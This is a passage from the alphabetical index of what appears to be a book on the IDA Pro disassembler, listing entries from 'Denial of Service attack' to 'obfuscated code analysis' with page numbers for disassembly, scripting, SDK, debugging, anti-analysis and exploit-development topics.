Denial of Service attack, 168

de-obfuscation of binaries, static,

454–472

script-oriented, 455–460

x86emu emulation-oriented,

460–472

and anti-debugging, 471–472

de-obfuscation using, 465–470

features of, 470–471

initialization of, 462

operation of, 463–465

de-obfuscation stub, 441–442, 446

destination buffer (dest), 273

destructor table, 492

destructors, 160–161

detecting

debuggers, 452–453

instrumentation, 451–452

virtualization, 449–451

DIF files, generating, 244

directory layout

overview, 38

for SDK, 287–289

sig directory, 39

til directory, 40

Directory option, debugger process

options dialog, 572

disassembler analysis tool, 454

disassembly, 3–14

anti–static analysis techniques,

434–437

first-generation languages, 4

fourth-generation languages, 4

how performed, 7–14

basic algorithm for, 8–9

linear sweep disassembly, 9–10

recursive descent disassembly,

11–14

overview, 5

reasons for, 6–7

second-generation languages, 4

theory of, 4

third-generation languages, 4

disassembly line display options, 109

disassembly line parts, 109

disassembly location, jumping to, 82

Disassembly tab

color selection dialog, 208

Options menu, 109

disassembly view

IDA desktop, 55

synchronizing with hex view, 67

disassembly window, 60–65

IDA graph view in, 61–64

IDA text view in, 64–65

disassembly window scroll bar, 82

disclosure, of vulnerability, 483

disclosure event, 483

discovery event, 483

disk image mode, for Bochs, 577

diskio.hpp file, 359, 362

dispatcher functions, 305

Display at startup checkbox, 44

Display Disassembly Line Parts section, Disassembly tab, 110

display format, selecting, 96

Display Graphs option, 487

Display indexes option, 126

Display only defined strings option,

Strings window, 71

display options, disassembly line, 109

DISPLAY_COMMAND_LINE option, 204,

206, 251

DISPLAY_PATCH_SUBMENU option, 204, 206

displays, 59–77

context-sensitive menu actions in, 60

in debugger, 518–521

principal, 60–66

disassembly window, 60–65

Functions window, 66

Output window, 66

secondary, 66–70

Enums window, 70

Exports window, 68

Hex View window, 67–68

Imports window, 68–69

Structures window, 69

tertiary, 70–77

Function Calls window, 76

Names window, 72–74

Problems window, 76–77

Segments window, 74

Signatures window, 74–75

Strings window, 70–72

Type Libraries window, 75

and undo, 59

DisplayWelcome value, 44

diStorm utility, 28

divide-by-zero error, 440

DLL (Dynamic Link Library), 462

dll2idt.exe parser, 231

dnbits field, 385

Dfirst function, 268

DfirstB function, 268

Dnext function, 268

DnextB function, 268

Do not display this dialog box again

option, 207

Does not return attribute, 117

Don’t pack database option, 51

DON’T SAVE database option, 52

dos.ldw (MS-DOS EXE loader), 45

doStruct function, 369

DOT language, 176

dotty tool, 176

double word. See 4 bytes of

storage (dd)

double-click navigation, 80–81, 185

double-clicking

cross-reference address, 173

in Function Calls Window, 76

function chunks, 115

hexadecimal values, 81

listed scripts, 250

in Names window, 72

in Output window, 81

in Segments window, 74

strings, in Strings window, 70

structure names, 146

symbol names, 175

download page, Hex-Rays, 499

DR0–3 registers, 523

DR0–7 registers, 523

dt_xxx values, 388

dummy names, 102, 104, 128, 214

Dump Embedded PE option, File

menu, 471

Dump option, File menu, 470

Dump Typeinfo to IDC File

command, 155

dumpbin utility, 25

dup2 function, 498

dw (2 bytes of storage), 97

Dword function, 262, 269, 456

dynamic analysis, of malware, 6

Dynamic Link Library (DLL), 462

dynamic linking, 22

dynamic memory allocation

function, 134

dynamic_cast operator, 163

dynamically computed target

addresses, anti–static analysis

techniques, 437–444

-e command-line argument, 28

e_lfanew field, 350

EAX register, 89, 94, 436,

439, 559–560

EBP (extended base pointer) register,

91, 439, 451

ebc.py, 411

ebx register, 552

Edit Breakpoint option, 523

Edit Exceptions button, Debugger

Setup dialog, 562

Edit menu, Plugins menu, 485, 508

editing imported functions, 230

EIP instruction pointer, 462

Element width attribute, 126

ELF binaries, 17

ELF encryption tool, Burneye,

455–458

ELF libraries, 219

ELF-specific parsing, 24

empty structure definition, 143

emu function, 390–391

emu.cpp file, 391

Emulate menu, Switch Thread

option, 471

emulation, advantage of over

debugging, 461

emulators, 390–394. See also x86emu

emulator, de-obfuscation of

binaries using

Enabled checkbox, Breakpoint Settings dialog, 524

EnableTracing function, 533

enabling line prefixes, 63

End address attribute, 116

ENTRY symbol, 575

entry.hpp, for API, 291

Enumerate Heap option, View

menu, 471

enumerated datatype, C enum, 70

enumerating

cross-references, 311–314

functions, 310

single stack frame, 490

structure members, 311

Enums window, 70

envp array, 422

epilogue, of functions, 85

Erdelyi, Gergely, 250, 280

error handling, in IDC language,

258–259

error messages, 258

error strings, 218

ESC key, 60, 82

ESI register, 457

ESP-based stack frame, 90–92

etc directory, for SDK, 288

event notification, for plug-ins,

321–322

exact matches binary searches, 493

exception confirmation dialog,

564–565

Exception Editing dialog, 563

exception handlers, 438–440, 472, 565

Exception Handling dialog, 564

exceptions

handling during remote

debugging, 574

handling with debugger, 561–568

Exceptions dialog, 562–563

exceptions.cfg file, 563, 574

EXE files, generating, 243–244

exec_request_t function, 286

execstack command, 38

executable files

Exports window, 68

using strings on, 28

executable statements, grouping, 83

execute_sync function, 286

execution

of plug-ins, 322–324

of scripts, 250–251

execution control commands, 522

execution traces, 526

exe.sig file, 421

_exit function, 422

Expand Struct Type option, Edit

menu, 145

expanding collapsed structures, 153

exploit-development, 6, 488–495

finding useful virtual addresses,

494–495

locating instruction sequences,

492–494

stack frame breakdown, 488–492

export entry, 231

export ordinal number, 68

Exports window, 68, 545

expressions, in IDC language, 253

expr.hpp file, 292, 331

extended base pointer (EBP) register,

91, 439, 451

extending IDC, with plug-ins,

331–333

extern keyword, 252

extern section, 477–478

external (global) symbols, 20

external mode graphs, 177

external-style graph, 176

extract_address function, 401

f argument, 129

f_LOADER type, 410

F2 hotkey, 523

F12 hotkey, 177

fake interrupt descriptor table, 462

Falliere, Nicolas, 453, 555–558

far addresses, 169

Far function attribute, 117

Fast Library Acquisition for Identification and Recognition (FLAIR), 216–217, 583

Fast Library Identification and

Recognition Technology

(FLIRT) signatures. See

FLIRT signatures

fastcall calling convention, 157

fastcall convention for x86, 87–88

fastcall modifier, 88

fclose function, 265

feature field, 381

FF_XXX constants, 307

fgetc function, 265

field names, 135

file classification, 16–20

file, 16–18

PE Tools, 18–19

PEiD, 19–20

File column, FLIRT signature

selection, 214

file command, 16

File dialog, 45

file extensions, 16

file loading, 45–48

File menu

Create C File option, 500

Create EXE File option, 542

Dump Embedded PE option, 471

Dump option, 470

Script File option, 554

File offset value, 239

File Open dialog, 44

File Save dialog, 365

FILE stream pointer, 365

FILE type, 359

file utility, 16–18, 218–219

FILE_EXTENSIONS option, 205–206

file2base function, 364–365

FileAlignment field, 352

FileAlignment value, 352

fileformatname parameter, 359,

362, 365

filelength function, 265

file-loading dialog, 358

FilemonClass class, 452

filename pattern, 205

FILEREG_PATCHABLE, 364

Find all occurrences checkbox, Text

Search dialog, 99

FindBinary function, 269, 493

FindCode function, 269, 272

FindData function, 269

FindText function, 269

FindWindow function, 452

FindXXX functions, 269

first_from function, 313

first_to function, 313

first-generation languages, 4

fix_proc utility, 404

fixed-length instructions, 9

fl_CF-type cross-references, 273

flag field, 385

flags field, for plug-ins, 317

flags field for loaders, 359

FLAIR (Fast Library Acquisition for Identification and Recognition), 216–217, 583

flair directory, 216

flair57.zip version, 216

Flake, Halvar, 481

flat memory model, 117

FLIRT (Fast Library Identification and Recognition Technology) signatures, 211–225

applying, 212–216

creating signature files, 216–225

creating pattern files, 219–221

static libraries for, 217–219

overview, 212

startup signatures, 224–225

flowcharts, 177–178

flowchart-style graph, graph view, 55

flows, 62

Follow system keyboard layout option,

Preferences dialog, 196

Follow TCP Stream command, 496

-fomit-frame-pointer compiler

option, 91

Font command, 57

Font menu, 519

foo function, 12

foobar subroutine, 82

footer function, 401

fopen function, 265

for loops, 254

forking existing projects,

CollabREate, 505

form argument, 338

form parameter, 305

form function, 264

formal parameter names, 228

format strings, 305, 492

formatting

constants, options for, 112

global variables, as structures, 149

instruction operands, 112–113

stack-allocated structures, 148

formcb_t function, 339

forward navigation button, 83

fourth-generation languages, 4

fprintf function, 265, 490–492

fpro.h, for API, 292

fputc function, 265

frame pointer, 84, 118

Frame pointer delta attribute, 117

frame.hpp, 292, 306

free_til function, 369

FreeBSD application, 213, 224,

422, 498

freeware versions, of IDA, 33

from address, in cross-references, 168

frregs field, 311

frsize field, 311

FS register, 439

full-line comments, 108

func_t (funcs.hpp), datatypes for SDK,

302, 308, 310

FuncItems generator, 283

funcs control block, 310

funcs.hpp, 292, 310

function call

graphs, 76, 169, 178

instructions, 12

tree, 76

Function Calls window, 76

function comments, 108

Function editing dialog, 116

function parameters, 83, 85

function tails, 115

Function Tracing option, Debugger

menu, 526

functions, 113–119

attributes for, 115–118

augmenting information for,

228–233

calling, 84–85

chunks of, 114–115

compiling, 89

creating new, 114

deleting, 114

emulated by x86emu, 467

enumerating, using API, 310

in IDC language

code cross-reference, 267

data cross-reference, 268

database manipulation, 268–269

database search, 269–270

dealing with functions, 266–267

disassembly line

components, 270

file input/output, 264–265

manipulating database

names, 266

reading and modifying data,

262–263

string-manipulation, 264

for user interaction, 263–264

oriented control flow graph, 185

overloading, C++, 162

overview of, 83

for SDK, 304–309

signatures for, 229

stack pointer adjustments, 118–119

tracing, 526

types, setting, 129

undefine, 119

Functions data display, 55

Functions list generator, 282

Functions menu, 471

Functions window, 56, 60, 66, 82,

175, 443

fuzzing technique, 6

G hotkey, 82, 207

g++ compiler, GNU, 86, 156

g++ versions, 163

Gaobot worm, 19

Gas (GNU Assembler), 9

gcc compiler, GNU, 86

GCC tags, 219

gdb (GNU Debugger), 454, 517

GDB Configuration dialog, 572–573

gdb sessions, 569

gdb_server, 569, 572–573

gdbserver component, GNU

Debugger, 517

GDL (Graph Description Language),

176, 193

gdl.hpp, for API, 292

General dialog, 60, 123

General Registers view, 519–520

General Registers window, 520, 525

general-purpose searches, 98

Generate serial names option, 124

generating signatures, 39

Get prefix, 262

get_byte function, 304

get_first_cref_from function, 309

get_first_cref_to function, 309

get_first_dref_from function, 309

get_first_dref_to function, 309

get_frame function, 306

get_frame_retsize function, 401

get_func function, 306

get_func_name function, 306

get_func_qty function, 306

get_long function, 304

get_next_func function, 306

get_many_bytes function, 304

get_member function, 307

get_member_by_name function, 307

get_name function, 306

get_name_ea function, 306

get_next_area function, 310

get_next_cref_from function, 309

get_next_cref_to function, 309

get_next_dref_from function, 309

get_next_dref_to function, 309

get_original_byte function, 304

get_original_long function, 304

get_original_word function, 304

get_original_XXX functions, 304

get_reg_val function, 538

get_screen_ea function, 305

get_segm_by_name function, 307

get_segm_name function, 308

get_struc function, 307

get_struc_id function, 307

get_true_segm_name function, 308

get_word function, 304

GetArrayElement function, 301

GetBptAttr function, 531

GetBptEA function, 531

GetBptQty function, 531

GetCommandLine function, 426–427

GetCommandLineA function, 552

GetDebuggerEvent function, 532–533,

538, 556

GetDisasm function, 270

GetEntryPointQty function, 275

GetEnvironmentStrings function, 427

GetEventXXX function, 533–535

GetFrameLvarSize function, 490

GetFrameRegsSize function, 490

getFuncAddr function, 479

GetFunctionAttr function, 266, 272

GetFunctionFlags function, 277

GetFunctionName function, 266

GetInputFile function, 275

getline function, 334

getmainargs library function, 425

GetMemberName function, 482

GetMemberOffset function, 271

GetMemberSize function, 482–483

GetMnem function, 270

GetModuleHandleA function, 444

GetOpnd function, 270

getn_area function, 310

getn_func function, 306

getnseg function, 308

getopcode.c program, 493

GetOperandValue function, 270

GetOpType function, 270

GetProcAddress function, 445–446, 448,

468–469, 550, 552, 554

GetRegValue function, 525, 530

getseg function, 307, 363

GetStrucSize, 271

Gigapede, 541

gl_comm variable, 397

global (external) symbols, 20

global array, 534

global offset table (GOT), 274, 492,

494–495

global persistent arrays, 259

global variables, formatting as

structures, 149

globally allocated arrays, 131–132

globally allocated structures, 137

gnome-terminal, Gnome, 193

GNU Assembler (Gas), 9

GNU binutils tool suite, 24

GNU compilers, 86, 136, 156

GNU Debugger (gdb), 454, 517

GNU linker, 404

Go button, 45

GOT (global offset table), 274, 492,

494–495

got section, 477–478, 495

goto statements, 502

graph components, 168

Graph Description Language (GDL),

176, 193

graph mode, 185

graph node, 178

Graph Overview data display, 55,

62, 185

Graph tab, 60

graph view, 55, 185–186

graph viewer, qwingraph, 176

graph view–style display, 55

GRAPH_FORMAT variable, 176

GRAPH_VISUALIZER option, 176, 193, 194, 202

graph-based display mode, IDA

freeware 5.0, 583

graphing, 176–187

integrated graph view, 185–188

third-party graphing, 176–185

call graphs, 178–180

cross-reference graphs, 180–182

custom cross-reference graphs,

182–185

flowcharts, 177–178

graphing applications, 176

graphs

grouping nodes in, 187

used in Function Calls Window, 76

graphviz project, 176

grep-style search, 290

Group Nodes option, 64, 187

grouping

blocks, in disassembly window, 64

executable statements, 83

nodes, within graphs, 187

GUI configuration file, 39

GUI versions, of IDA, 197

gunzip archive, 37

.h suffix, 290

Hall of Shame, Hex-Rays website, 32

handling exceptions

with debugger, 561–568

during remote debugging, 574

Hardware Breakpoint checkbox,

Breakpoint Settings

dialog, 524

Hardware breakpoint mode radio

buttons, Breakpoint Settings

dialog, 524

hardware breakpoints, 523, 524,

544, 546

HAS_CALL flags, 389

HAS_JABS flag, 389

HAS_JREL flag, 389

hash function, 447

hashset function, 300

hashstr function, 300

hashval function, 300

hashval_long function, 300

hashvals, 297, 300

hashXXX functions, 300

head command, 212

header fields, PE Tools, 19

header files, for API, 290–294

area.hpp, 291

auto.hpp, 291

bytes.hpp, 291

dbg.hpp, 291

entry.hpp, 291

expr.hpp, 292

fpro.h, 292

frame.hpp, 292

funcs.hpp, 292

gdl.hpp, 292

ida.hpp, 292

idp.hpp, 292

kernwin.hpp, 292

lines.hpp, 292

loader.hpp, 292

name.hpp, 293

netnode.hpp, 293

pro.h, 293

search.hpp, 293

segment.hpp, 293

struct.hpp, 293

typeinf.hpp, 293

ua.hpp, 293

xref.hpp, 293–294

header function, 401

header structure, MS-DOS, 152

.headers program segment, 462

.headers section, 354

.heap database segment, 462

heap program, 134

heap_array variable, 135

HeapAlloc function, 468

heap-allocated arrays, 134–135

heap-allocated structures, 138–140

help files, 204

help member, for plug-ins, 318

Help menu, IDA, 34

HELPFILE option, 203

hex dumps, 99, 191

hex editor, 67

hex searches, conducting, 100

hex values, two-digit, 99

Hex View window, 40, 67–68, 99, 519

hexadecimal constant, 112

hexadecimal values, 81

Hex-Rays

blog, 579

bulletin boards, posting on, 58

debugging server, remote debugging using, 570–573

download page for, 499

plug-in, 500–502

stance on piracy, 32

support page and forums, 35

hidden messages, restoring, 44

Hide Casts option, 501

Hide Group option, 187

hide_wait_box function, 323

HideDebugger.idc script, 560–561

hiding debugger, 555–560

History subkey, IDA Windows registry

key, 45

HKEY_CURRENT_USER\Software\Hex-Rays\IDA registry key, 44, 207

HKEY_CURRENT_USER\Software\Hex-Rays\IDA\Hidden Messages registry key, 207

hook_to_notification_point function,

321, 399, 536

Hostname option, debugger process

options dialog, 572

hotkey field, 331

hotkey reassignment, in idagui.cfg, 204

hotkeys, 40, 261

.hpp suffix, 290

HT_DBG function, 537

HT_DBG notification type, 536

HTI_PAK1 constant, 368

HTI_XXX values, 368

HTML document, 16

HTML files, 204, 245

HTTP response packet, 371

hyperlinks, vs. names, 80

HyperUnpackMe2, 472–473

icebp instruction, 564

id field for processors, 385

.id0 file, 49

.id1 file, 49

IDA command line, 251

IDA comments, using semicolon prefix in, 107–108

IDA

configuration file, 37

crashes, restarting after, 52–53

cross-references, 76

database, as virtual memory,

460–461

database files

closing, 51–52

creation of, 50–51

and debugger, 541–543

overview, 48–50

reopening, 52–53

searching, 98–100

desktop

behavior of during analysis,

56–57

overview, 53–56

tips and tricks for, 57

directory, 36

download page, 190

executables, 36

extensions, loaders directory, 39

freeware 5.0, 581–583

graph view, in disassembly window

creating additional disassembly

windows, 64

grouping and collapsing blocks

in, 64

overview, 61

panning in, 62–63

rearranging blocks in, 64

IDA Palace, 36

IDA Sync, Windows Asynchronous

Sockets techniques used

by, 504

installer, 34

loader, 50

modules, plug-ins directory, 39

notifications, CollabREate, 504

parser, 150

scripting, 256, 455

as software

licenses, 33

purchasing, 34

upgrading, 34

user interface of, 40

versions, 33

stack-pointer analysis, 230

Strings options, 123

structures, 142–146

creating new, 142–143

editing structure members,

144–146

stack frames as, 146

text view, in disassembly window,

64–65

View-EIP disassembly window,

519–520

View-ESP disassembly window, 520

Windows registry key, 45

workspace, 44

ida_export function, 294

IDA_SDK_VERSION macro, 293

idaapi module, 281, 579

idaapi.processor_t class, 411

ida.cfg file, 39, 111, 176, 193, 202–203

<IDADIR> install location, 36

idag64.exe, 38

IDA-generated variable names,

mapping, 96–97

idag.exe, 36

idagui.cfg configuration file, 39,

203–206, 238, 251

IDA.HLP file, 338

ida.hpp file, 290, 292

ida.idc file, 261

ida.int file, 233

idaidp.hpp, 380

idainfo (ida.hpp), datatypes for

SDK, 303

idainfo structure, 292

ida.int comment file, 234

ida.key file, 32

idamake.pl, 324

IdaPdf plug-in, 509–510

IDAPython plug-in, 37, 503

examples, 281–284

enumerating cross-references, 283

enumerating exported

functions, 283–284

enumerating functions, 282

enumerating instructions,

282–283

idaq64.exe, 38

idaq.exe, 36

idasdk61.zip file, 286

IDAStealth configuration dialog, 561

IdaStealth plug-in, for debugger,

560–561

.idata section, 241

idatui.cfg file, 39, 206–207

idauser.cfg file, 203

idauserg.cfg file, 206

idausert.cfg file, 206

idautils module, 281–282

IDA-View window, 55, 60

idaw.exe, 36

ida-x86emu plug-in, 342, 461–462, 506

.idb extension, 51

.idb files, 229, 504

IDB mode, for Bochs, 575–576

IDB_2_PAT utility, 221

idb_event::byte_patched, 321

idb_event::cmt_changed, 321

IDC command dialog, 255

idc directory, 39

IDC functions, SDK implementation,

586–608

IDC language

error handling in, 258–259

examples, 270–280

emulating assembly language

behavior, 278–280

enumerating cross-references,

272–274

enumerating exported

functions, 275

enumerating functions, 270–271

enumerating instructions,

271–272

finding and labeling function

arguments, 275–277

expressions, 253

functions

code cross-reference, 267

data cross-reference, 268

database manipulation, 268–269

database search, 269–270

dealing with functions, 266–267

disassembly line components, 270

IDC language (continued)

functions (continued)

file input/output, 264–265

manipulating database

names, 266

reading and modifying data,

262–263

string-manipulation, 264

for user interaction, 263–264

objects, 256–257

persistent data storage in, 259–260

programs, 257–258

SDK cross-reference for, 585–608

statements, 254

variables, 252–253

idc module, 281

IDC script, 455

IDC slices, 253

IDC statements, 553

idc_create_netnode function, 332

idc_func_t datatype, 331

idc_value_t (expr.hpp), datatypes for

SDK, 302, 332

IDC-based loader, 373

idc.idc file, 257

Identical Functions, PatchDiff2, 486

Identifier search, 99

IDP_INTERFACE_VERSION constant, 316

idp.def file, 404

idp.hpp file, 292, 400

ids directory, 39

IDS files

augmenting information for

functions, 230–233

IDA parlance, 39

ids hierarchy, 231

IDS utilities, 228–229

idsnames file, 233

idsutils, 229

.idt file, 275

.idt generator script, 283

Ignore instructions/data definitions

option, Strings window, 71–72

IMAGE_DOS_HEADER structure,

152–154, 350

IMAGE_NT_HEADERS structure, 152–154,

350, 352

IMAGE_SECTION_HEADER structure, 352

IMAGE_SECTION_HEADER template, 352

ImageBase field, 351

Import REConstruction (ImpREC)

utility, 541

import table, 68

import_node netnode, 294

import_type function, 369

imported functions

editing, 230

obfuscation, anti–static analysis

techniques, 444–448

Imports window, 68–69, 443–444

ImpREC (Import REConstruction)

utility, 541

in instruction, 451

include (INC) files, generating, 243

include directive, 151, 261

include directory, 288

include files, 151

Include in names list option, for

named locations, 104

include statement, 261

indent parameter, 397

INDENTATION option, 202

index function, 222

Index of IDC functions, 252, 261

Indexes radio buttons, 126

inf.mf flag, 400

inheritance hierarchy,

determining, 164

inheritance relationships, in C++,

164–165

init member, for plug-ins, 317

init method, 536

init_loader_options function, 360, 363

initialization, of plug-ins, 320–321

inline constructors, 164

inline functions, 164

Input file option, debugger process

options dialog, 572

Input File options, 47

ins.cpp file, 381

INSERT key, 143, 152, 155

Insert option, 149

insn_t (ua.hpp), datatypes for SDK,

293, 303, 385

install_make.txt file, 289

install_visual.txt file, 326

install_xxx.txt files, 288, 324

installation of 32-bit Python,

IDAPython, 503

installing, 36–40

32-bit vs. 64-bit, 38

directory layout, 38–40

on Linux, 37–38

on OS X, 37–38

plug-ins, 329–330

and SELinux, 38

on Windows, 36–37

instruction emulator, 380, 460–461

instruction operands, formatting,

112–113

Instruction Pointer (IP), 527

instruction sets, CPU, 286

Instruction Tracing option, Debugger

menu, 526

Instructions constant, 383

instrumentation, detecting, 451–452

int 3 instruction, 439, 523, 564

int get_segm_qty function, 308

int set_segm_name function, 308

int type, 128

integer index, 230

Intel syntax, 9

intel_data function, 398

internal heap implementation, 468

interpreter, for Python byte code, 379

invoke_callbacks function, 400

I/O functions, 292

IP (Instruction Pointer), 527

iret instruction, 435

is_far_jump function, 401

is_sp_based function, 401

is_switch function, 401

iscode member, 313

IsDebugged field, PEB, 556

IsDebuggerPresent function, 452,

468, 556

isLoaded function, 262, 263, 304

Items on line attribute, 125

iteration techniques, using API,

310–314

enumerating cross-references,

311–314

enumerating functions, 310

enumerating structure

members, 311

iTERM, 194

itype field, 386

j suffix, 171

ja instruction, 418

Java byte code, 379

Java Database Connectivity

(JDBC), 505

Java loader, 372

Java virtual machine, 472

JDBC (Java Database

Connectivity), 505

jmp esi instruction, 492

jmp esp instruction, 492–493

jmp statement, 10

Jump command, 477

jump flow type, 62, 171

Jump function, 263, 264, 428

jump tables, compiler differences for,

416–420

Jump to Address command, 477

Jump to Address dialog, 82

Jump To Cursor button, x86emu

Emulator dialog, 464

Jump to Next Position option, 83

Jump to Previous Position

operation, 82

Jump to Problem command, 204

JumpQ option, 204

jump-style cross-references, 171

jumpto function, 305

junk strings, 71

jz instruction, 436

Kernel Options, 46, 115

kernel32_GetCommandLineA, 552

kernel32_VirtualAlloc function,

578–579

kernel32.dll, 446, 448, 520, 546,

552, 559

kernwin.hpp, for API, 292

key file, safeguarding, 34

keyboards

different layouts, 194

zoom control, 62

Kiel OMF 166 object files, 219

konsole, KDE’s, 193

Koret, Joxean, 508

-L option, 23

label component, 338

launching, 44–48

debugger, 514–518

Go button, 45

New button, 44

Previous button, 45

process, 517

Windows installer, 36

ldd (list dynamic dependencies)

utility, 22–23

ldr directory, for SDK, 288

LDRF_RELOAD flag, 359

LDSC (loader description) object, 359

leave instruction, 93, 408

legacy mode graphs, 193

len function, 283

letter codes, 21

Levine, John R., 22

lib directory, for SDK, 288

libbfd (Binary File Descriptor

library), 24

libc_FreeBSD80.exc file, 222

libc_FreeBSD80.pat file, 220

libc_start_main function, 423–424, 427

libc.a version, 213

Library func attribute, 117

library handle, 468

Library name column, FLIRT signature selection, 214

license agreement dialog, 197

license enforcement, 32

licenses, for IDA, 33

life cycle, of plug-ins, 318–319

limitations

of consoles, 190

of IDA freeware 5.0, 582

line prefixes, enabling, 63

Line prefixes option, 110

linear sweep disassembly, 9–10

lines.hpp file, 292, 395

link libraries, 343

linking, 22

linput_t (loader input type), 359

Linux

based IDA installation, 193

console mode for, 192–194

console mouse server for, 192

installing on, 37–38

terminal programs on, 192

text display in, 192

linux_server server component, 570

linux_serverx64 server component, 570

list dynamic dependencies (ldd)

utility, 22–23

list_callers function, 313

listing view, 55

listing-style display, 55

Litchfield, David, 493

little-endian, CPU, 10

lnames data member, 402

Load a New File dialog, 46

Load Desktop command, 57

Load desktop option, Windows

menu, 209

Load from file radio button, x86emu

Set Memory Values dialog, 465

Load type library option, in Type

Libraries window, 75

load_file function, 359, 372, 410

load_pcap_file function, 369–370

load_simpleton_file, 363

loader description (LDSC) object, 359

loader input type (linput_t), 359

loader modules, for binary files

overview, 358

pcap loader, 366–372

simpleton loader, 361–366

writing using SDK, 358–360

Loader segment checkbox, Change

segment attributes dialog, 543

Loader segments button, Memory

snapshot confirmation

dialog, 542

loader warnings, 49

LOADER_EXT variable, 366

loader_failure function, 359

loader_t structure, 292, 358

loader-generated informational

messages, 49

loader.hpp file, 292, 316, 358

loaders directory, 39, 45

loadfile function, 265

loading files, 45–47, 155

Loading Offset field, 46

loading process, 358

Loading Segment field, 46

loadint utilities, 233–235

loadint57.zip version, 233

LoadLibrary function, 445–446, 550

LoadLibraryA function, 447, 468

Local Bochs debugger, 575

local debugging, 517

Local name option, for named

locations, 104

Local Types command, 149

Local Types entry dialog, 150

Local Types window, 149–150

local variables

layout, in stack frames, 89

naming, 102–103

Local variables area attribute, 116

locations, renaming, 104

LocByName function, 267, 274

LocByNameEx function, 266

lodsb instruction, 458

Log if same IP option, Tracing

Options dialog, 527

logical addresses, 242

loopne instruction, 10

lowercase letter codes, 21

LPH struct, 380, 385

lpSubKey parameter, 229

lread4bytes function, 362

LST files, generating, 243

ltoa function, 264

Mac keyboard, vs. PC keyboard, 194

mac_server server component, 570

mac_serverx64 server component, 570

Machine field, 351

machine languages, 4, 111

Mach-O loader, 410

MackT, 541

MACRO keyword, 207

macros, 206–207, 249

magic files, 16

magic numbers, 16

main method, compiler differences

for, 421–428

Main toolbar, turning off, 208

make files, plug-ins, 500

Make imports section option, 244

make_data notification, 401

MakeByte function, 269

MakeCode function, 268

makecode parameter, 364

MakeComm function, 269

MakeFunction function, 269

MakeLine function, 395, 397

MakeNameEx function, 266

MakeStr function, 269

MakeUnkn function, 268

malicious PDF files, 509

malloc function, 66, 134, 477

malware analysis, reasons for

disassembly, 6

mangled names, 163

manipulating disassembly, 101–126

arrays, attributes for, 124–126

code display options, 109–111

commenting, 106–108

converting data to code (and vice

versa), 119–120

data transformations, 121–124

formatting instruction operands,

112–113

functions, 113–119

naming, 102–105

Manual load option, for file

headers, 152

manually overriding purged bytes, 230

MAP files, generating, 242

mapping, IDA-generated variable

names, 96–97

Mark as autogenerated option, 124

Mark consecutive traced events with

same IP option, Tracing

Options dialog, 527–528

MASM (Microsoft Assembler), 9

master list of structures, 152

Matched Functions, PatchDiff2,

486–487

MAX_NAMES_LENGTH option, 202

Maximum possible size attribute, 125

MAXSTR constant, 586

MD5 value, CollabREate, 505

mem2base function, 370

member_t (struct.hpp), datatypes for

SDK, 303, 307

members array, 311

.memcpy, 274

Memory Organization dialog, 48

Memory snapshot confirmation

dialog, 542

memory usage parameters, 202

memqty field, 311

memset operation, 430, 495

menu bar, console user interface, 190

Message function, 254, 263, 579

MessageBoxA function, 444

messages

loader-generated informational, 49

restoring hidden, 44

Metasploit project, 493, 496

Micallef, Steve, 35, 289

Microsoft, Patch Tuesday cycle, 476

Microsoft Assembler (MASM), 9

Microsoft Developer Network

(MSDN), 25

Microsoft linker, 404

Microsoft Visual C++ compiler, 114

Microsoft Visual Studio suite, 25

Minimum offset column, 136

MIPS binary, 278

MIPS processor module, 240

Misc tab, color selection dialog, 208

mitigation, of vulnerability, 483

mitigation event, 483

mkidp syntax, 404

mkidp.exe utility, 404

mnemonics, 4

modal dialogs, 174, 337

modeless dialogs, 174, 337

Modify menu item, 520

module directory, for SDK, 288

Modules view, 519

Modules window, 520–521

mouse support, 190

mov instructions, 12, 92, 234

mov statements, 275–276

Move Current Segment

command, 354

move_segm function, 360

movsb instruction, 527

MSDN (Microsoft Developer

Network), 25

MS-DOS 8.3 name-length

convention, 221

MS-DOS EXE loader (dos.ldw), 45

MS-DOS executable file, 18

MS-DOS header structure, 152

MS-DOS stub, 403–405

msfpescan tool, Metasploit project, 493

msg function, 305

mutual ptrace technique, 453

my_func function, 255

MyNav plug-in, 508–509

mynav.py script, 508

MZ magic number, 16, 152

N hotkey, 102–103, 105

-n option (sigmake), 224

-n option (loadint), 234

nalt.hpp file, 294

.nam file, 49

Name conflict dialog, 105

name decoration, 162

Name directive, 231

Name generation area, 123

name mangling, 26, 162–163

Name of function attribute, 115

Name function, 266

name parameter, 308, 364

name-change dialog, 102

NameChars set, 202

NameEx function, 266

named constants, catalog of, 112–113

named licenses, 33

named locations, 103–105

Autogenerated name option, 104

Create name anyway option, 105

Include in names list option, 104

Local name option, 104

Public name option, 104

Weak name option, 105

name-demangling options, 162

name.hpp, 293

name-length convention,

MS-DOS 8.3, 221

names, vs. hyperlinks, 80

Names window, 72–74, 102

naming, 102–105

conventions, Hex-Rays, 501

import table entries, 552

parameters and local variables,

102–103

NASM (Netwide Assembler), 9, 28

navigating disassembly

double-click navigation, 80–81

jump to address, 82

navigation history, 82–83

searching database, 98–100

navigation band, 54, 443–444

navigation history list, 185

ncol parameter, 336

ndisasm utility, 28

NEF_XXX flags, 359

neflags parameter, 359

negative deltas, 392

netnode class, 259, 293–295, 301

netnode index value, 331

netnode.hpp file, 293–295

netnodenumber member, 294, 296

netnodes, 294–301, 585

creating, 295–297

data storage in, 297–301

deleting, 301

Netwide Assembler (NASM), 9, 28

network attack sessions, 496

network connection, X.25-style, 113

New button, 44

new operator, 159–160

New Project dialog, Visual Studio,

326–327

new vertices, introducing, 64

Newger, Jan, 560

Next Sequence of Bytes option,

Search menu, 100

NextFunction function, 266

nm utility, 20–21

No edge arrow, 62

no operation (NOP) instructions,

240, 494

NO_OBSOLETE_FUNCS macro, 316

nodeidx_t operator, 296

nodes, 168, 187

noGPM option, TVision, 192

nonmodal dialog, 337

nonstandard structures, 142

NOP (no operation) instructions,

240, 494

NOP slides, 494, 496–497

Normal edge arrow, 62

normal flow, 62

notification event, 483

notification of vulnerability, 483

notify field, 399

notify function, 400

NOVICE option, 206

NtContinue function, 567

ntdll_NtQueryInformationProcess

function, 557

ntdll.dll, 546, 557–558, 567

NtGlobalFlags field, PEB, 556–557

NtQueryInformationProcess

function, 557–558

NtSetInformationThread function, 558

NTSTATUS code, 558

NULL pointer, 299

Number of elements attribute, 125

Number of opcode bytes option, 111

NumberOfSections field, 352

o_displ type, 392

o_imm type, 392

o_mem type, 392

o_near type, 392

obfuscated code analysis, 433–474

anti–dynamic analysis techniques,

449–454

detecting debuggers, 452–453

detecting instrumentation,

451–452

detecting virtualization, 449–451

preventing debugging, 453–454

anti–static analysis techniques,

434–449

disassembly desynchronization,

434–437

dynamically computed target

